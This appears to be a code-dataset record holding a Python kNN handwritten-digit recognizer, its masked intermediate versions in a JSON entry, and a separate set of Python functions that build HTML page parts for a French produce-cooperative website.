        trainingMat[i, :] = img2vector(dir_trainingSet + '/%s' % fileNameStr)
    return labels, trainingMat
def getResult(filename, trainingDigits):
    """Classify the handwritten-digit image stored at `filename`.

    Args:
        filename: path of the digit image to classify.
        trainingDigits: directory containing the training bitmaps.

    Returns:
        The predicted digit.
    """
    labels, trainingMat = loadTrainingSet(trainingDigits)
    # Read the raw image bytes (e.g. b'\x7f\x12\xdf...).
    with open(filename, 'rb') as f:
        rawBytes = f.read()
    # Convert the image into a 32x32 text bitmap on disk, then into the
    # 1x1024 feature vector the kNN classifier expects.
    bitmapPath = changeImg2Text(rawBytes, filename)
    featureVect = img2vector(bitmapPath)
    prediction = classify(featureVect, trainingMat, labels, 3)
    print('预测手写数字识别为:', prediction)
    # The original demo also overwrote `filename` with the prediction, which
    # destroyed the source image; that step is intentionally omitted.
    return prediction
# Pre-process the raw input image.
def changeImg2Text(filePath, filename):
    """Convert raw image bytes into a 32x32 '0'/'1' text bitmap on disk.

    Args:
        filePath: raw bytes of the image file.
        filename: original image path; the bitmap is written to the current
            working directory as '<basename>.txt'.

    Returns:
        The name of the text bitmap file that was written.
    """
    # Derive '<basename>.txt'; normalise Windows backslashes so forward-slash
    # paths work too (the original split only on '\\').
    fileNameStr = filename.replace('\\', '/').split('/')[-1].split('.')[0] + '.txt'
    # Decode the raw bytes (BytesIO is required on Python 3) and shrink to
    # the 32x32 grid the kNN features expect.
    # https://codedump.io/share/aztOtkSsnO2U/1/python-valueerror-embedded-null-byte-when-reading-png-file-from-bash-pipe
    im = Image.open(BytesIO(filePath))
    # ANTIALIAS was removed in Pillow 10; LANCZOS is its direct replacement.
    im2 = im.resize((32, 32), Image.LANCZOS)
    img = array(im2)
    # NOTE(review): assumes a 3-channel RGB image — RGBA or greyscale input
    # would break the R, G, B unpack below; confirm upstream callers.
    m, n = img.shape[:2]
    # 'with' guarantees the bitmap file is closed even if thresholding fails.
    with open(fileNameStr, 'w') as fr:
        for i in range(m):
            for j in range(n):
                R, G, B = img[i, j, :]
                # Threshold tuned per image set with a colour picker: the RGB
                # midpoint between white and the target ink colour.  A pixel
                # darker than this counts as ink ('1'), else background ('0').
                # Black/white sets used R<40,G<40,B<40; the orange '0' set
                # used R<245,G<153,B<120; the grey '2' set uses the values
                # below.
                if R < 185 and G < 100 and B < 100:
                    fr.write('1')
                else:
                    fr.write('0')
            fr.write('\n')
    return fileNameStr
|
normal
|
{
"blob_id": "1ab5147ed8ce808de9667052b6d17f320d62484f",
"index": 4694,
"step-1": "<mask token>\n\n\ndef classify(inX, dataSet, labels, k):\n dataSetSize = dataSet.shape[0]\n diffMat = tile(inX, (dataSetSize, 1)) - dataSet\n sqDiffMat = diffMat ** 2\n sqDistances = sqDiffMat.sum(axis=1)\n distances = sqDistances ** 0.5\n sortedDistIndicies = distances.argsort()\n classCount = {}\n for i in range(k):\n voteIlabel = labels[sortedDistIndicies[i]]\n classCount[voteIlabel] = classCount.get(voteIlabel, 0) + 1\n sortedClassCount = sorted(classCount.items(), key=operator.itemgetter(1\n ), reverse=True)\n return sortedClassCount[0][0]\n\n\n<mask token>\n\n\ndef loadTrainingSet(dir_trainingSet):\n print('把trainingDigits文件夹里的所有训练集导入')\n trainingFileList = listdir(dir_trainingSet)\n m = len(trainingFileList)\n trainingMat = zeros((m, 1024))\n for i in range(m):\n fileNameStr = trainingFileList[i]\n fileStr = fileNameStr.split('.')[0]\n classNumStr = int(fileStr.split('_')[0])\n hwLabels.append(classNumStr)\n trainingMat[i, :] = img2vector(dir_trainingSet + '/%s' % fileNameStr)\n return hwLabels, trainingMat\n\n\n<mask token>\n\n\ndef changeImg2Text(filePath, filename):\n fileNameStr = filename.split('\\\\')[-1].split('.')[0] + '.txt'\n fr = open(fileNameStr, 'w')\n \"\"\"\n https://codedump.io/share/aztOtkSsnO2U/1/python-valueerror-embedded-null-byte-when-reading-png-file-from-bash-pipe\n \"\"\"\n im = Image.open(BytesIO(filePath))\n im2 = im.resize((32, 32), Image.ANTIALIAS)\n img = array(im2)\n print(img.shape, Image.ANTIALIAS)\n m, n = img.shape[:2]\n for i in range(m):\n for j in range(n):\n R, G, B = img[i, j, :]\n \"\"\"\n 这部分的颜色用 PhotoShop 取色器,调参。\n RGB的值选择 白色点 和 目标颜色点的中点的RGB\n \"\"\"\n if R < 185 and G < 100 and B < 100:\n fr.write('1')\n else:\n fr.write('0')\n fr.write('\\n')\n fr.close()\n return fileNameStr\n",
"step-2": "<mask token>\n\n\ndef classify(inX, dataSet, labels, k):\n dataSetSize = dataSet.shape[0]\n diffMat = tile(inX, (dataSetSize, 1)) - dataSet\n sqDiffMat = diffMat ** 2\n sqDistances = sqDiffMat.sum(axis=1)\n distances = sqDistances ** 0.5\n sortedDistIndicies = distances.argsort()\n classCount = {}\n for i in range(k):\n voteIlabel = labels[sortedDistIndicies[i]]\n classCount[voteIlabel] = classCount.get(voteIlabel, 0) + 1\n sortedClassCount = sorted(classCount.items(), key=operator.itemgetter(1\n ), reverse=True)\n return sortedClassCount[0][0]\n\n\ndef img2vector(filename):\n returnVect = zeros((1, 1024))\n fr = open(filename)\n for i in range(32):\n lineStr = fr.readline()\n for j in range(32):\n returnVect[0, 32 * i + j] = int(lineStr[j])\n return returnVect\n\n\n<mask token>\n\n\ndef loadTrainingSet(dir_trainingSet):\n print('把trainingDigits文件夹里的所有训练集导入')\n trainingFileList = listdir(dir_trainingSet)\n m = len(trainingFileList)\n trainingMat = zeros((m, 1024))\n for i in range(m):\n fileNameStr = trainingFileList[i]\n fileStr = fileNameStr.split('.')[0]\n classNumStr = int(fileStr.split('_')[0])\n hwLabels.append(classNumStr)\n trainingMat[i, :] = img2vector(dir_trainingSet + '/%s' % fileNameStr)\n return hwLabels, trainingMat\n\n\ndef getResult(filename, trainingDigits):\n \"\"\"\n filename 测试集dir\n trainingDigits 训练集dir\n \"\"\"\n hwLabels, trainingMat = loadTrainingSet(trainingDigits)\n with open(filename, 'rb') as f:\n filePath = f.read()\n fileNameStr = changeImg2Text(filePath, filename)\n inputVect = img2vector(fileNameStr)\n classifierResult = classify(inputVect, trainingMat, hwLabels, 3)\n print('预测手写数字识别为:', classifierResult)\n return classifierResult\n\n\ndef changeImg2Text(filePath, filename):\n fileNameStr = filename.split('\\\\')[-1].split('.')[0] + '.txt'\n fr = open(fileNameStr, 'w')\n \"\"\"\n https://codedump.io/share/aztOtkSsnO2U/1/python-valueerror-embedded-null-byte-when-reading-png-file-from-bash-pipe\n \"\"\"\n im = 
Image.open(BytesIO(filePath))\n im2 = im.resize((32, 32), Image.ANTIALIAS)\n img = array(im2)\n print(img.shape, Image.ANTIALIAS)\n m, n = img.shape[:2]\n for i in range(m):\n for j in range(n):\n R, G, B = img[i, j, :]\n \"\"\"\n 这部分的颜色用 PhotoShop 取色器,调参。\n RGB的值选择 白色点 和 目标颜色点的中点的RGB\n \"\"\"\n if R < 185 and G < 100 and B < 100:\n fr.write('1')\n else:\n fr.write('0')\n fr.write('\\n')\n fr.close()\n return fileNameStr\n",
"step-3": "<mask token>\n\n\ndef classify(inX, dataSet, labels, k):\n dataSetSize = dataSet.shape[0]\n diffMat = tile(inX, (dataSetSize, 1)) - dataSet\n sqDiffMat = diffMat ** 2\n sqDistances = sqDiffMat.sum(axis=1)\n distances = sqDistances ** 0.5\n sortedDistIndicies = distances.argsort()\n classCount = {}\n for i in range(k):\n voteIlabel = labels[sortedDistIndicies[i]]\n classCount[voteIlabel] = classCount.get(voteIlabel, 0) + 1\n sortedClassCount = sorted(classCount.items(), key=operator.itemgetter(1\n ), reverse=True)\n return sortedClassCount[0][0]\n\n\ndef img2vector(filename):\n returnVect = zeros((1, 1024))\n fr = open(filename)\n for i in range(32):\n lineStr = fr.readline()\n for j in range(32):\n returnVect[0, 32 * i + j] = int(lineStr[j])\n return returnVect\n\n\n<mask token>\nhwLabels, trainingMat = [], []\n\n\ndef loadTrainingSet(dir_trainingSet):\n print('把trainingDigits文件夹里的所有训练集导入')\n trainingFileList = listdir(dir_trainingSet)\n m = len(trainingFileList)\n trainingMat = zeros((m, 1024))\n for i in range(m):\n fileNameStr = trainingFileList[i]\n fileStr = fileNameStr.split('.')[0]\n classNumStr = int(fileStr.split('_')[0])\n hwLabels.append(classNumStr)\n trainingMat[i, :] = img2vector(dir_trainingSet + '/%s' % fileNameStr)\n return hwLabels, trainingMat\n\n\ndef getResult(filename, trainingDigits):\n \"\"\"\n filename 测试集dir\n trainingDigits 训练集dir\n \"\"\"\n hwLabels, trainingMat = loadTrainingSet(trainingDigits)\n with open(filename, 'rb') as f:\n filePath = f.read()\n fileNameStr = changeImg2Text(filePath, filename)\n inputVect = img2vector(fileNameStr)\n classifierResult = classify(inputVect, trainingMat, hwLabels, 3)\n print('预测手写数字识别为:', classifierResult)\n return classifierResult\n\n\ndef changeImg2Text(filePath, filename):\n fileNameStr = filename.split('\\\\')[-1].split('.')[0] + '.txt'\n fr = open(fileNameStr, 'w')\n \"\"\"\n 
https://codedump.io/share/aztOtkSsnO2U/1/python-valueerror-embedded-null-byte-when-reading-png-file-from-bash-pipe\n \"\"\"\n im = Image.open(BytesIO(filePath))\n im2 = im.resize((32, 32), Image.ANTIALIAS)\n img = array(im2)\n print(img.shape, Image.ANTIALIAS)\n m, n = img.shape[:2]\n for i in range(m):\n for j in range(n):\n R, G, B = img[i, j, :]\n \"\"\"\n 这部分的颜色用 PhotoShop 取色器,调参。\n RGB的值选择 白色点 和 目标颜色点的中点的RGB\n \"\"\"\n if R < 185 and G < 100 and B < 100:\n fr.write('1')\n else:\n fr.write('0')\n fr.write('\\n')\n fr.close()\n return fileNameStr\n",
"step-4": "<mask token>\nimport operator\nfrom numpy import *\nfrom PIL import Image\nfrom os import listdir\nfrom io import BytesIO\n\n\ndef classify(inX, dataSet, labels, k):\n dataSetSize = dataSet.shape[0]\n diffMat = tile(inX, (dataSetSize, 1)) - dataSet\n sqDiffMat = diffMat ** 2\n sqDistances = sqDiffMat.sum(axis=1)\n distances = sqDistances ** 0.5\n sortedDistIndicies = distances.argsort()\n classCount = {}\n for i in range(k):\n voteIlabel = labels[sortedDistIndicies[i]]\n classCount[voteIlabel] = classCount.get(voteIlabel, 0) + 1\n sortedClassCount = sorted(classCount.items(), key=operator.itemgetter(1\n ), reverse=True)\n return sortedClassCount[0][0]\n\n\ndef img2vector(filename):\n returnVect = zeros((1, 1024))\n fr = open(filename)\n for i in range(32):\n lineStr = fr.readline()\n for j in range(32):\n returnVect[0, 32 * i + j] = int(lineStr[j])\n return returnVect\n\n\n<mask token>\nhwLabels, trainingMat = [], []\n\n\ndef loadTrainingSet(dir_trainingSet):\n print('把trainingDigits文件夹里的所有训练集导入')\n trainingFileList = listdir(dir_trainingSet)\n m = len(trainingFileList)\n trainingMat = zeros((m, 1024))\n for i in range(m):\n fileNameStr = trainingFileList[i]\n fileStr = fileNameStr.split('.')[0]\n classNumStr = int(fileStr.split('_')[0])\n hwLabels.append(classNumStr)\n trainingMat[i, :] = img2vector(dir_trainingSet + '/%s' % fileNameStr)\n return hwLabels, trainingMat\n\n\ndef getResult(filename, trainingDigits):\n \"\"\"\n filename 测试集dir\n trainingDigits 训练集dir\n \"\"\"\n hwLabels, trainingMat = loadTrainingSet(trainingDigits)\n with open(filename, 'rb') as f:\n filePath = f.read()\n fileNameStr = changeImg2Text(filePath, filename)\n inputVect = img2vector(fileNameStr)\n classifierResult = classify(inputVect, trainingMat, hwLabels, 3)\n print('预测手写数字识别为:', classifierResult)\n return classifierResult\n\n\ndef changeImg2Text(filePath, filename):\n fileNameStr = filename.split('\\\\')[-1].split('.')[0] + '.txt'\n fr = open(fileNameStr, 'w')\n \"\"\"\n 
https://codedump.io/share/aztOtkSsnO2U/1/python-valueerror-embedded-null-byte-when-reading-png-file-from-bash-pipe\n \"\"\"\n im = Image.open(BytesIO(filePath))\n im2 = im.resize((32, 32), Image.ANTIALIAS)\n img = array(im2)\n print(img.shape, Image.ANTIALIAS)\n m, n = img.shape[:2]\n for i in range(m):\n for j in range(n):\n R, G, B = img[i, j, :]\n \"\"\"\n 这部分的颜色用 PhotoShop 取色器,调参。\n RGB的值选择 白色点 和 目标颜色点的中点的RGB\n \"\"\"\n if R < 185 and G < 100 and B < 100:\n fr.write('1')\n else:\n fr.write('0')\n fr.write('\\n')\n fr.close()\n return fileNameStr\n",
"step-5": "'''\n手写识别系统\n构建识别类\nRecognize\n调用getResult()函数即可\n'''\n\nimport operator\nfrom numpy import *\nfrom PIL import Image\nfrom os import listdir\nfrom io import BytesIO\n\ndef classify(inX, dataSet, labels, k):\n dataSetSize = dataSet.shape[0] #训练数据集的行数\n # 计算距离\n diffMat = tile(inX, (dataSetSize,1)) - dataSet\n sqDiffMat = diffMat**2\n sqDistances = sqDiffMat.sum(axis=1)\n distances = sqDistances**0.5\n # 返还距离排序的索引\n sortedDistIndicies = distances.argsort() \n classCount={} \n for i in range(k):\n voteIlabel = labels[sortedDistIndicies[i]]\n classCount[voteIlabel] = classCount.get(voteIlabel,0) + 1\n sortedClassCount = sorted(classCount.items(), \n key=operator.itemgetter(1), reverse=True)\n \n return sortedClassCount[0][0]\n\n# 将图片转化为行向量\ndef img2vector(filename):\n returnVect = zeros((1,1024))\n fr = open(filename)\n for i in range(32):\n lineStr = fr.readline()\n for j in range(32):\n returnVect[0,32*i+j] = int(lineStr[j])\n return returnVect\n\n'''\n如何让加载训练集值运行一次?\n'''\nhwLabels , trainingMat = [] , []\n\ndef loadTrainingSet(dir_trainingSet):\n \n print('把trainingDigits文件夹里的所有训练集导入')\n #把trainingDigits文件夹里的所有训练集导入\n trainingFileList = listdir(dir_trainingSet)\n #print(trainingFileList)\n m = len(trainingFileList)\n trainingMat = zeros((m,1024)) # 初始化训练矩阵\n for i in range(m):\n # 此三步,将所有训练集的名称分割只取出第一个\n fileNameStr = trainingFileList[i]\n fileStr = fileNameStr.split('.')[0]\n classNumStr = int(fileStr.split('_')[0])\n \n # 得到一个由训练集 名称首个number的矩阵\n hwLabels.append(classNumStr)\n \n # 每一个 训练集的 txt 都转成一个 1行1025列的向量\n trainingMat[i,:] = img2vector(dir_trainingSet+'/%s' % fileNameStr)\n\n return hwLabels , trainingMat\n\n\ndef getResult(filename,trainingDigits):\n '''\n filename 测试集dir\n trainingDigits 训练集dir\n '''\n hwLabels , trainingMat = loadTrainingSet(trainingDigits)\n \n # 为输入的数字图片分类,读取图片为\n with open(filename, 'rb') as f:\n filePath = f.read()\n # 此时 filePath 是十六进制字节 如: \\x7f\\x12\\xdf\n fileNameStr = changeImg2Text(filePath,filename)\n inputVect = 
img2vector(fileNameStr)\n \n classifierResult = classify(inputVect, trainingMat, hwLabels, 3)\n print( '预测手写数字识别为:',classifierResult)\n return classifierResult\n \n # 原demo里有这句话,可以这句话,会将预测的图片失效,暂注释 保留\n #with open(filename, 'w') as f:\n # f.write(str(classifierResult))\n\n# 处理初始图形\ndef changeImg2Text(filePath,filename):\n # 就是字符串 \\ 分割后(其中 \\\\ 是加了转译),取最后一个 2.jpg,再 以 . 分割取 名字\n fileNameStr = filename.split('\\\\')[-1].split('.')[0] + '.txt'\n fr = open(fileNameStr, 'w')\n \n #读图片转矩阵,Python 3 要加 BytesIO(filePath)\n '''\n https://codedump.io/share/aztOtkSsnO2U/1/python-valueerror-embedded-null-byte-when-reading-png-file-from-bash-pipe\n '''\n im = Image.open(BytesIO(filePath))\n #print(im) # <PIL.JpegImagePlugin.JpegImageFile image mode=RGB size=206x376 at 0x8D99C50>\n im2 = im.resize((32, 32), Image.ANTIALIAS)\n img = array(im2)\n print( img.shape , Image.ANTIALIAS )\n \n m, n = img.shape[:2]\n\n for i in range(m):\n for j in range(n):\n R, G, B = img[i, j, :]\n # 因为,图片首先要 处理成灰度图,所以根据,灰度进而识别\n '''\n 这部分的颜色用 PhotoShop 取色器,调参。\n RGB的值选择 白色点 和 目标颜色点的中点的RGB\n '''\n #if R < 40 and G < 40 and B < 40: # 这些参数时对于黑白色的区分\n #if R < 245 and G < 153 and B < 120: # 对 0 文件里,橙色图片的划分\n if R < 185 and G < 100 and B < 100: # 对 2 文件里,灰色图片的划分\n fr.write('1')\n else:\n fr.write('0')\n fr.write('\\n')\n\n fr.close()\n return fileNameStr\n",
"step-ids": [
3,
5,
6,
7,
8
]
}
|
[
3,
5,
6,
7,
8
] |
def entete():
    """Return the shared HTML head of every page (doctype through the
    opening <body> tag), including the CSS and JavaScript asset links."""
    entete='''
    <!DOCTYPE HTML>
<html lang=“fr”>
    <head>
        <title>AMAP'PATATE</title>
        <meta charset="UTF-8" />
        <link rel="stylesheet" type="text/css" href="/IENAC15/amapatate/css/font-awesome.min.css" />
        <link rel="stylesheet" type="text/css" href="/IENAC15/amapatate/css/bootstrap.min.css" />
        <link rel="stylesheet" type="text/css" href="/IENAC15/amapatate/css/style.css" />
        <link rel="stylesheet" type="text/css" href="/IENAC15/amapatate/css/menu.css" />
        <link rel="stylesheet" type="text/css" href="/IENAC15/amapatate/css/form.css" />
        <link rel="stylesheet" type="text/css" href="/IENAC15/amapatate/css/button.css" />
        <script type="text/javascript" src= " /IENAC15/amapatate/js/jquery-2.2.0.min.js" ></script>
					<script type="text/javascript" src= " /IENAC15/amapatate/js/bootstrap.min.js" ></script>
    </head>
    <body>
    '''
    return entete
def nav():
    """Return the site navigation bar as an HTML string.

    Always contains the Home / School / Clubs / Log-in entries; when a
    user is logged in (Session()["nom"] is a non-empty string) a
    "Page privée" entry is appended as well.

    NOTE(review): Session() is defined elsewhere — presumably it returns a
    dict-like view of the current session; verify against its definition.
    """
    nav='''
    <nav>
        <ul>
	    <li><a href="/IENAC15/amapatate/index.py">
	    	<span class="fa-stack fa-lg">
  	    		<i class="fa fa-circle fa-stack-2x"></i>
  	    		<i class="fa fa-home fa-stack-1x fa-inverse"></i>
  	    	</span>
	    	Accueil</a>
	    </li>
        <li><a href="/IENAC15/amapatate/index.py#ecole">
            <span class="fa-stack fa-lg">
  	    		<i class="fa fa-circle fa-stack-2x"></i>
  	    		<i class="fa fa-plane fa-stack-1x fa-inverse"></i>
  	    	</span>
            L'école</a>
        	<ul>
        		<li><a href="http://www.eag-tournament.com">
        		   <i class="fa fa-soccer-ball-o fa-fw"></i>EAG</a>
        		</li>
        		<li><a href="index.html#contacter">
        			<i class="fa fa-phone fa-fw"></i>Nous Contacter</a>
        		</li>
        		</ul>
        </li>
		 	<li><a href="/IENAC15/amapatate/python/clubs.py">
		 		<span class="fa-stack fa-lg">
  	    		<i class="fa fa-circle fa-stack-2x"></i>
  	    		<i class="fa fa-bicycle fa-stack-1x fa-inverse"></i>
  	    	</span>
		 		Les clubs</a>
		 	</li>
		 	<li><a href="/IENAC15/amapatate/python/connecter.py">
		 		<span class="fa-stack fa-lg">
  	    		<i class="fa fa-circle fa-stack-2x"></i>
  	    		<i class="fa fa-user fa-stack-1x fa-inverse"></i>
  	    	</span>
		 	Se connecter</a>
		 	</li>
		 	'''
    # Only logged-in users (non-empty "nom" in the session) get the private page link.
    if "nom" in Session() and Session()["nom"]!='':
        nav+='''
        <li><a href="/IENAC15/amapatate/python/page_prive.py">
		 		<span class="fa-stack fa-lg">
  	    		<i class="fa fa-circle fa-stack-2x"></i>
  	    		<i class="fa fa-user fa-stack-1x fa-inverse"></i>
  	    	</span>
		 	Page privée</a>
		 	</li>
		 	'''
    # Close the list and the <nav> element.
    nav+='''
    		</ul>
    </nav>
    '''
    return nav
def titre(intitule):
    """Build the page <header> banner, inserting *intitule* as the <h1> text."""
    debut = '''
    <header>
       <h1>'''
    fin = '''</h1>
       <p>L'AMAP fruits et légumes qui vous donne la patate </p>
    </header>
    '''
    return debut + intitule + fin
def footer():
    """Return the closing HTML common to every page: the copyright footer
    followed by the </body> and </html> tags."""
    lignes = (
        '',
        '    <footer>© All right reserved ENAC',
        '    </footer>',
        '    </body>',
        '    </html>',
        '    ',
    )
    return '\n'.join(lignes)
|
normal
|
{
"blob_id": "933758002c5851a2655ed4c51b2bed0102165116",
"index": 4742,
"step-1": "def entete():\n entete = \"\"\"\n <!DOCTYPE HTML>\n<html lang=“fr”>\n <head>\n <title>AMAP'PATATE</title>\n <meta charset=\"UTF-8\" />\n <link rel=\"stylesheet\" type=\"text/css\" href=\"/IENAC15/amapatate/css/font-awesome.min.css\" />\n <link rel=\"stylesheet\" type=\"text/css\" href=\"/IENAC15/amapatate/css/bootstrap.min.css\" />\n <link rel=\"stylesheet\" type=\"text/css\" href=\"/IENAC15/amapatate/css/style.css\" />\n <link rel=\"stylesheet\" type=\"text/css\" href=\"/IENAC15/amapatate/css/menu.css\" />\n <link rel=\"stylesheet\" type=\"text/css\" href=\"/IENAC15/amapatate/css/form.css\" />\n <link rel=\"stylesheet\" type=\"text/css\" href=\"/IENAC15/amapatate/css/button.css\" />\n <script type=\"text/javascript\" src= \" /IENAC15/amapatate/js/jquery-2.2.0.min.js\" ></script>\n\t\t\t\t\t<script type=\"text/javascript\" src= \" /IENAC15/amapatate/js/bootstrap.min.js\" ></script>\n </head>\n <body>\n\n \"\"\"\n return entete\n\n\n<mask token>\n",
"step-2": "def entete():\n entete = \"\"\"\n <!DOCTYPE HTML>\n<html lang=“fr”>\n <head>\n <title>AMAP'PATATE</title>\n <meta charset=\"UTF-8\" />\n <link rel=\"stylesheet\" type=\"text/css\" href=\"/IENAC15/amapatate/css/font-awesome.min.css\" />\n <link rel=\"stylesheet\" type=\"text/css\" href=\"/IENAC15/amapatate/css/bootstrap.min.css\" />\n <link rel=\"stylesheet\" type=\"text/css\" href=\"/IENAC15/amapatate/css/style.css\" />\n <link rel=\"stylesheet\" type=\"text/css\" href=\"/IENAC15/amapatate/css/menu.css\" />\n <link rel=\"stylesheet\" type=\"text/css\" href=\"/IENAC15/amapatate/css/form.css\" />\n <link rel=\"stylesheet\" type=\"text/css\" href=\"/IENAC15/amapatate/css/button.css\" />\n <script type=\"text/javascript\" src= \" /IENAC15/amapatate/js/jquery-2.2.0.min.js\" ></script>\n\t\t\t\t\t<script type=\"text/javascript\" src= \" /IENAC15/amapatate/js/bootstrap.min.js\" ></script>\n </head>\n <body>\n\n \"\"\"\n return entete\n\n\n<mask token>\n\n\ndef footer():\n footer = \"\"\"\n <footer>© All right reserved ENAC\n </footer>\n </body>\n </html>\n \"\"\"\n return footer\n",
"step-3": "def entete():\n entete = \"\"\"\n <!DOCTYPE HTML>\n<html lang=“fr”>\n <head>\n <title>AMAP'PATATE</title>\n <meta charset=\"UTF-8\" />\n <link rel=\"stylesheet\" type=\"text/css\" href=\"/IENAC15/amapatate/css/font-awesome.min.css\" />\n <link rel=\"stylesheet\" type=\"text/css\" href=\"/IENAC15/amapatate/css/bootstrap.min.css\" />\n <link rel=\"stylesheet\" type=\"text/css\" href=\"/IENAC15/amapatate/css/style.css\" />\n <link rel=\"stylesheet\" type=\"text/css\" href=\"/IENAC15/amapatate/css/menu.css\" />\n <link rel=\"stylesheet\" type=\"text/css\" href=\"/IENAC15/amapatate/css/form.css\" />\n <link rel=\"stylesheet\" type=\"text/css\" href=\"/IENAC15/amapatate/css/button.css\" />\n <script type=\"text/javascript\" src= \" /IENAC15/amapatate/js/jquery-2.2.0.min.js\" ></script>\n\t\t\t\t\t<script type=\"text/javascript\" src= \" /IENAC15/amapatate/js/bootstrap.min.js\" ></script>\n </head>\n <body>\n\n \"\"\"\n return entete\n\n\n<mask token>\n\n\ndef titre(intitule):\n titre = \"\"\"\n <header>\n <h1>\"\"\" + intitule + \"\"\"</h1>\n <p>L'AMAP fruits et légumes qui vous donne la patate </p>\n </header>\n \"\"\"\n return titre\n\n\ndef footer():\n footer = \"\"\"\n <footer>© All right reserved ENAC\n </footer>\n </body>\n </html>\n \"\"\"\n return footer\n",
"step-4": "def entete():\n entete = \"\"\"\n <!DOCTYPE HTML>\n<html lang=“fr”>\n <head>\n <title>AMAP'PATATE</title>\n <meta charset=\"UTF-8\" />\n <link rel=\"stylesheet\" type=\"text/css\" href=\"/IENAC15/amapatate/css/font-awesome.min.css\" />\n <link rel=\"stylesheet\" type=\"text/css\" href=\"/IENAC15/amapatate/css/bootstrap.min.css\" />\n <link rel=\"stylesheet\" type=\"text/css\" href=\"/IENAC15/amapatate/css/style.css\" />\n <link rel=\"stylesheet\" type=\"text/css\" href=\"/IENAC15/amapatate/css/menu.css\" />\n <link rel=\"stylesheet\" type=\"text/css\" href=\"/IENAC15/amapatate/css/form.css\" />\n <link rel=\"stylesheet\" type=\"text/css\" href=\"/IENAC15/amapatate/css/button.css\" />\n <script type=\"text/javascript\" src= \" /IENAC15/amapatate/js/jquery-2.2.0.min.js\" ></script>\n\t\t\t\t\t<script type=\"text/javascript\" src= \" /IENAC15/amapatate/js/bootstrap.min.js\" ></script>\n </head>\n <body>\n\n \"\"\"\n return entete\n\n\ndef nav():\n nav = \"\"\"\n <nav>\n <ul>\n\t <li><a href=\"/IENAC15/amapatate/index.py\">\n\t \t<span class=\"fa-stack fa-lg\">\n \t \t\t\t<i class=\"fa fa-circle fa-stack-2x\"></i>\n \t \t\t\t<i class=\"fa fa-home fa-stack-1x fa-inverse\"></i>\n \t \t\t</span>\n\t \tAccueil</a>\n\t </li>\n <li><a href=\"/IENAC15/amapatate/index.py#ecole\">\n <span class=\"fa-stack fa-lg\">\n \t \t\t\t<i class=\"fa fa-circle fa-stack-2x\"></i>\n \t \t\t\t<i class=\"fa fa-plane fa-stack-1x fa-inverse\"></i>\n \t \t\t</span>\n L'école</a>\n \t<ul>\n \t\t\t<li><a href=\"http://www.eag-tournament.com\">\n \t\t\t <i class=\"fa fa-soccer-ball-o fa-fw\"></i>EAG</a>\n \t\t\t</li>\n \t\t\t<li><a href=\"index.html#contacter\">\n \t\t\t\t<i class=\"fa fa-phone fa-fw\"></i>Nous Contacter</a>\n \t\t\t</li>\n \t\t\t</ul>\n </li>\n\t\t \t<li><a href=\"/IENAC15/amapatate/python/clubs.py\">\n\t\t \t\t<span class=\"fa-stack fa-lg\">\n \t \t\t\t<i class=\"fa fa-circle fa-stack-2x\"></i>\n \t \t\t\t<i class=\"fa fa-bicycle fa-stack-1x fa-inverse\"></i>\n \t 
\t\t</span>\n\t\t \t\tLes clubs</a>\n\t\t \t</li>\n\t\t \t<li><a href=\"/IENAC15/amapatate/python/connecter.py\">\n\t\t \t\t<span class=\"fa-stack fa-lg\">\n \t \t\t\t<i class=\"fa fa-circle fa-stack-2x\"></i>\n \t \t\t\t<i class=\"fa fa-user fa-stack-1x fa-inverse\"></i>\n \t \t\t</span>\n\t\t \tSe connecter</a>\n\t\t \t</li>\n\t\t \t\"\"\"\n if 'nom' in Session() and Session()['nom'] != '':\n nav += \"\"\"\n <li><a href=\"/IENAC15/amapatate/python/page_prive.py\">\n\t\t \t\t<span class=\"fa-stack fa-lg\">\n \t \t\t\t<i class=\"fa fa-circle fa-stack-2x\"></i>\n \t \t\t\t<i class=\"fa fa-user fa-stack-1x fa-inverse\"></i>\n \t \t\t</span>\n\t\t \tPage privée</a>\n\t\t \t</li>\n\t\t \t\"\"\"\n nav += \"\"\"\n \t\t\t</ul>\n </nav>\n \"\"\"\n return nav\n\n\ndef titre(intitule):\n titre = \"\"\"\n <header>\n <h1>\"\"\" + intitule + \"\"\"</h1>\n <p>L'AMAP fruits et légumes qui vous donne la patate </p>\n </header>\n \"\"\"\n return titre\n\n\ndef footer():\n footer = \"\"\"\n <footer>© All right reserved ENAC\n </footer>\n </body>\n </html>\n \"\"\"\n return footer\n",
"step-5": "def entete():\n entete='''\n <!DOCTYPE HTML>\n<html lang=“fr”>\n <head>\n <title>AMAP'PATATE</title>\n <meta charset=\"UTF-8\" />\n <link rel=\"stylesheet\" type=\"text/css\" href=\"/IENAC15/amapatate/css/font-awesome.min.css\" />\n <link rel=\"stylesheet\" type=\"text/css\" href=\"/IENAC15/amapatate/css/bootstrap.min.css\" />\n <link rel=\"stylesheet\" type=\"text/css\" href=\"/IENAC15/amapatate/css/style.css\" />\n <link rel=\"stylesheet\" type=\"text/css\" href=\"/IENAC15/amapatate/css/menu.css\" />\n <link rel=\"stylesheet\" type=\"text/css\" href=\"/IENAC15/amapatate/css/form.css\" />\n <link rel=\"stylesheet\" type=\"text/css\" href=\"/IENAC15/amapatate/css/button.css\" />\n <script type=\"text/javascript\" src= \" /IENAC15/amapatate/js/jquery-2.2.0.min.js\" ></script>\n\t\t\t\t\t<script type=\"text/javascript\" src= \" /IENAC15/amapatate/js/bootstrap.min.js\" ></script>\n </head>\n <body>\n\n '''\n return entete\n\ndef nav():\n nav='''\n <nav>\n <ul>\n\t <li><a href=\"/IENAC15/amapatate/index.py\">\n\t \t<span class=\"fa-stack fa-lg\">\n \t \t\t\t<i class=\"fa fa-circle fa-stack-2x\"></i>\n \t \t\t\t<i class=\"fa fa-home fa-stack-1x fa-inverse\"></i>\n \t \t\t</span>\n\t \tAccueil</a>\n\t </li>\n <li><a href=\"/IENAC15/amapatate/index.py#ecole\">\n <span class=\"fa-stack fa-lg\">\n \t \t\t\t<i class=\"fa fa-circle fa-stack-2x\"></i>\n \t \t\t\t<i class=\"fa fa-plane fa-stack-1x fa-inverse\"></i>\n \t \t\t</span>\n L'école</a>\n \t<ul>\n \t\t\t<li><a href=\"http://www.eag-tournament.com\">\n \t\t\t <i class=\"fa fa-soccer-ball-o fa-fw\"></i>EAG</a>\n \t\t\t</li>\n \t\t\t<li><a href=\"index.html#contacter\">\n \t\t\t\t<i class=\"fa fa-phone fa-fw\"></i>Nous Contacter</a>\n \t\t\t</li>\n \t\t\t</ul>\n </li>\n\t\t \t<li><a href=\"/IENAC15/amapatate/python/clubs.py\">\n\t\t \t\t<span class=\"fa-stack fa-lg\">\n \t \t\t\t<i class=\"fa fa-circle 